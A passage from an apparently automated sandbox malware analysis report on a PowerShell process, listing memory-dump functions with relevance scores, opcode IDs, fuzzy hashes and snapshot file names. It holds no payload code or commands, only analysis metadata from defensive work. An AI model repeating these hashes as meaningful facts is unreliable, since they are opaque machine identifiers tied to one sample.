                                                                                                                                                                                                          • Opcode Fuzzy Hash: 939684e5acc306e72aed9c0a9f4a6b7596187cba5c50385ff8047ddf5a5de6e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21AE75A042588FCB10DBAED45079FBFF5AF89320F29846ED419E7340CB74A885CBA5
                                                                                                                                                                                                          Function 0326A4A0 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: df60631122fdfb70ad79692fb785aeb310b76a21537c075592c8e0ed6b09e2fb
                                                                                                                                                                                                          • Instruction ID: 50e4824253800b7ac6706d00bd5248467b8301d751301c0d51fe95b816b1a917
                                                                                                                                                                                                          • Opcode Fuzzy Hash: df60631122fdfb70ad79692fb785aeb310b76a21537c075592c8e0ed6b09e2fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC012B343153501FC315D7759C50B5F3BA7AFC9610F6408BDE0468F2E6CDA06C098794
                                                                                                                                                                                                          Function 0326A4B0 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 0732b3f8ac6eb27262c9b9cf4e1fac7243b22e62861927a4f562436c54bf87e2
                                                                                                                                                                                                          • Instruction ID: 03ffe9bc61b309d09eec3dba1d7d3dc5bc8e2ffe11e90ff94cc2f6dd5a974897
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0732b3f8ac6eb27262c9b9cf4e1fac7243b22e62861927a4f562436c54bf87e2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F0903435031067D228EA669C61B6F779BEBC9A10FA44C3CE1465F3D9CEA1BC0A4798
                                                                                                                                                                                                          Function 03264310 Relevance: .5, Instructions: 472COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 086539f926a353944cee13c1a6991d1272436af8d89fc25d19e8cfcc14d16d18
                                                                                                                                                                                                          • Instruction ID: c601e3eb59b452949c87a59a6dcdb0d18958008bb7ded8401c88d756ed50bd5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 086539f926a353944cee13c1a6991d1272436af8d89fc25d19e8cfcc14d16d18
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA129074A152899FCB06DFA9D490A9DFFB1BF49310F198096D484EB362C730ED85CBA0
                                                                                                                                                                                                          Function 093D1278 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3e1ad2a35b513ba70019f3aff704c01bca3ba7b064e8c76e53a319138cb19a94
                                                                                                                                                                                                          • Instruction ID: c7565512f5f9ba8bd37deda13c10b6d0d15e51e4a3a1a28f11c0f6aac5a7e6b6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e1ad2a35b513ba70019f3aff704c01bca3ba7b064e8c76e53a319138cb19a94
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1C14E75A05214DFDB18CB98D561AAAB7F2FF89310F148569E805ABB44CB31EC81CFA1
                                                                                                                                                                                                          Function 03264243 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ea1e9fc3325f45f97ea937885bbd56b4891447aa78ce5a4db77100d95fc852eb
                                                                                                                                                                                                          • Instruction ID: 42c1d14ef3c4d2d1e7367ad218c64e54a16d55833b0b383a787346e901200911
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea1e9fc3325f45f97ea937885bbd56b4891447aa78ce5a4db77100d95fc852eb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14514E7590A7D48FCB03EB6999704DABFB0AF47210B1A40D7C0D4CB2A3D6249A88C776
                                                                                                                                                                                                          Function 0326F718 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7587ea02e7c411c8726f0b52384f6029a2517d6d86343110b0b23ac90ea45408
                                                                                                                                                                                                          • Instruction ID: 314b48233bf0c7692106fc0ab4d876839159c2621c18a6b17e1b16697299d103
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7587ea02e7c411c8726f0b52384f6029a2517d6d86343110b0b23ac90ea45408
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A612875E10249DFCB14DFA9D58469DFBF1EF88310F28816AE809AB354DB709C81CB50
                                                                                                                                                                                                          Function 0326F708 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7720af4fd0da80c43560613a85e1dcf9867046f6d66b69a8923f471dc6679608
                                                                                                                                                                                                          • Instruction ID: cda718116556835168608ee4bd6cb7224ce66035399b191962bfc414cd5bbb71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7720af4fd0da80c43560613a85e1dcf9867046f6d66b69a8923f471dc6679608
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A513975E11248DFCB54DFA9D58468DFBF5EF88310F188069E819AB354DB709885CF60
                                                                                                                                                                                                          Function 0326709F Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6c2dc988d64a917b088dac97c7d6e5a380cd9554984f5c31be20b712678850bc
                                                                                                                                                                                                          • Instruction ID: 6152f0cc86f448229dd749db50ff74cd7d5166994d0fdae8c2b912ee7e116246
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c2dc988d64a917b088dac97c7d6e5a380cd9554984f5c31be20b712678850bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 365191346052448FCB05DB79C4506AEBBF2EF89300F1980AAD846AF796CA759C46CBA0
                                                                                                                                                                                                          Function 0326A9FC Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: fb4de21dff510d3eb75e6dd7468640a1e4fd018f0717ca1ecbb50771b846d9bd
                                                                                                                                                                                                          • Instruction ID: d09958b74c1db48d323c43c6e58d18c386c050dccc13f702f90de0a570605df0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb4de21dff510d3eb75e6dd7468640a1e4fd018f0717ca1ecbb50771b846d9bd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE510A74610249CFCB04DF69C594ADEBBB2BF88314F149569E441AB2A5DB70DCC5CFA0
                                                                                                                                                                                                          Function 032670E8 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 4c028f597d67fe9c4952869a198f91ccb17ce63a42f219199b0e63682bb6a332
                                                                                                                                                                                                          • Instruction ID: 192b479822988f7e607f23a48e5c21553173ec2bb5e20bdf3b7a58d0a6afea8f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c028f597d67fe9c4952869a198f91ccb17ce63a42f219199b0e63682bb6a332
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9413E74A002049FDB08DFB9C4507AEBAF7AF8C310F18C469D846AB795CB75DC418BA4
                                                                                                                                                                                                          Function 032634F8 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6bc13da79b1d803e825d341414b9306270058ffa5fefcf6e106c07de6597749b
                                                                                                                                                                                                          • Instruction ID: ef7596532ab2060133fce0472443eb87420a15e284b085fa475bd7c89bb2b671
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bc13da79b1d803e825d341414b9306270058ffa5fefcf6e106c07de6597749b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A418B75A042498FCB15CF5CC5908AAFBB1FF49310B29829AD545EB3A2C735EC81CBA5
                                                                                                                                                                                                          Function 07734E78 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6c3cb74a6c177d7e405964dea2587dbbd53a0b893fc12d1b7b092b2190cb1c40
                                                                                                                                                                                                          • Instruction ID: 428394521a2579ffbd781d3007f1effe5780ca30fd3da3f54ef5c91700d1bd15
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c3cb74a6c177d7e405964dea2587dbbd53a0b893fc12d1b7b092b2190cb1c40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7331D5B4B00214AFD718D7E4C814BAE7AA3AF85354F648828D8517F395CF75DC818BA5
                                                                                                                                                                                                          Function 032645C3 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8b6e071ec91e71296615fea6cddcba61381bf77bfa968cff0646c435ae5df00b
                                                                                                                                                                                                          • Instruction ID: 17e1aca6354d82b250cf947c71e74d5f8b626d193044f4a789b6d1b04db6a235
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b6e071ec91e71296615fea6cddcba61381bf77bfa968cff0646c435ae5df00b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D041F374A01209DFDB04DBA9D594A9DFBF2AF88304F288559E444AB361CB71ED82CF90
                                                                                                                                                                                                          Function 07736284 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5ae88af1d204e03c84821b9792bbab859ab353a719581b58ce14d58b305afca8
                                                                                                                                                                                                          • Instruction ID: 94c92066ebfd9a1ddbef67bbad0dce2e584415d83a9cd5bec2d6698d305b0b09
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ae88af1d204e03c84821b9792bbab859ab353a719581b58ce14d58b305afca8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF315EF5704302ABDB14966884517BA7B92AFC2391F148879D882CB686EF39D885C771
                                                                                                                                                                                                          Function 07730EB0 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8faf237e71725b9ad80f28e58c79cc259c92ea3fafd1d41051f3abb524528ac9
                                                                                                                                                                                                          • Instruction ID: 52aa2085c76cdb969bde839637d050edee65ac3008d090358d583da3571aa879
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8faf237e71725b9ad80f28e58c79cc259c92ea3fafd1d41051f3abb524528ac9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC215AB13003269BEB24A5B9485077BB6D7ABC4391F24883AE409D72C3DA75C880C361
                                                                                                                                                                                                          Function 0326E491 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 978ccd59a64c5ea408f8ebdb1918dbe8217b683e836ea5f97081e5032b86f195
                                                                                                                                                                                                          • Instruction ID: 62d3c5d55790ce03bb92d1acd221c5f677760c4211a4734fb484f0b9db91b3bf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 978ccd59a64c5ea408f8ebdb1918dbe8217b683e836ea5f97081e5032b86f195
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C318F78B102098FDB04DF69C1946AE7BF6EF89300F148029E405EB354EA748C818B90
                                                                                                                                                                                                          Function 03263528 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a4b8774a5dd10a09a909091ec11cce5c1de65da4c4c82723012f92c124e90a3c
                                                                                                                                                                                                          • Instruction ID: c73d7394417a8664f3ff6334d4543e1194e62aecb49a1b4cd6d5bf9cdf8b7ae8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4b8774a5dd10a09a909091ec11cce5c1de65da4c4c82723012f92c124e90a3c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B313875A001099FCB14CF5CC5809AAFBF1FF89310B258299DA19EB7A1C735EC91CBA4
                                                                                                                                                                                                          Function 0326E4A0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c28a8fe81338d8e2cab7c1cbbf413b652d733de8d14fa1122ac08a5850aa61f9
                                                                                                                                                                                                          • Instruction ID: 276020dfac75d2167ffef32782d3532469a27238c3f26df96fbb9554a7de1d86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c28a8fe81338d8e2cab7c1cbbf413b652d733de8d14fa1122ac08a5850aa61f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C314178A102099FDB04DF69D5947AE7BF6EFC9310F158029E405EB354EB749C818B51
                                                                                                                                                                                                          Function 0326E359 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bea71ba2558cb2dcdf75d1e0b3d6bf5358c58257c7c811e1d99bd818b5297318
                                                                                                                                                                                                          • Instruction ID: d4738ae7d80966fe80bcd84d7237d2524d054e785b063d92046540e0e31a85c2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bea71ba2558cb2dcdf75d1e0b3d6bf5358c58257c7c811e1d99bd818b5297318
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 643170B8A002499FDB04EB64D854AAE7BB2EF88300F1488A9D155AF3D5CB749D41CF60
                                                                                                                                                                                                          Function 07730E95 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f8c3282834a0037da11599836b2d7524883a1437a38285336f18f2258bee2ed6
                                                                                                                                                                                                          • Instruction ID: f46b8d63db0da8e637f274779e05c9e306cfa4db9b51b2f370866df915c8eded
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8c3282834a0037da11599836b2d7524883a1437a38285336f18f2258bee2ed6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38217CB13043965BE73255B148407B77BD7AB81390F28882AE844DB2C3DA79D890C371
                                                                                                                                                                                                          Function 07736568 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6742da02fbd69ded6ee1f2bdc8be6b9cdfeb4cfff2f495a6296fe5ff94e20802
                                                                                                                                                                                                          • Instruction ID: d17e96662c96f8f3b32c269405a0f75a19b123c68689daefe8e6757c29e9bcbe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6742da02fbd69ded6ee1f2bdc8be6b9cdfeb4cfff2f495a6296fe5ff94e20802
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84216AF5300215ABC624566E881167BBBD69BD16D1B288C3FD941CB6C6DE76C841C370
                                                                                                                                                                                                          Function 0326E368 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1384e2a12e2b928e62f7a98e20b417df024ec68108a705146fe7792735783654
                                                                                                                                                                                                          • Instruction ID: 16c31d2385ad9dfa46683eb802231ad462f815f023f37effd65b91ff1fa282ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1384e2a12e2b928e62f7a98e20b417df024ec68108a705146fe7792735783654
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 753161B8A002099FDB04EF64D854AAE7BB6EF88300F108879D155AF3D4DB759D41CF90
                                                                                                                                                                                                          Function 0326BFE0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f47c2ac81446e835189fa63b7367fcbc470f146d704f0f70ca5634c911784b6b
                                                                                                                                                                                                          • Instruction ID: 4014564890ec4cbdaf7bd7703f9dfa256546a30468f7fd226a323be2fc245108
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f47c2ac81446e835189fa63b7367fcbc470f146d704f0f70ca5634c911784b6b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56318B71A157448FDB60DF6AC08838AFFF6EF88310F28846EC89E9B215C67554C58B21
                                                                                                                                                                                                          Function 0326BFF0 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ae10eaa44ada9239e626a36db70ad9e4ca8f9460e275ff9894e7137f92068ea4
                                                                                                                                                                                                          • Instruction ID: f7f835c7eff8628ee58dea9839099f5bcd48a6eae9372423014133d130d8045e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae10eaa44ada9239e626a36db70ad9e4ca8f9460e275ff9894e7137f92068ea4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32217C719107448EDB60DF6AC48838AFBF6EF88310F28C46ED89D9B345D77564C18B65
                                                                                                                                                                                                          Function 077309B8 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 08aca8b823868e8d0233d6ceb3677c8e1cd073d7f50673f06e1dd22133204eab
                                                                                                                                                                                                          • Instruction ID: acafb5a3123414263d87401287579fb624d11318744ab37046850d80d288aac7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08aca8b823868e8d0233d6ceb3677c8e1cd073d7f50673f06e1dd22133204eab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5711B7F5A012199FCB249FB995401AEB7E6BF88390B25C565CC29E7382D734DD40CBA0
                                                                                                                                                                                                          Function 032646F8 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
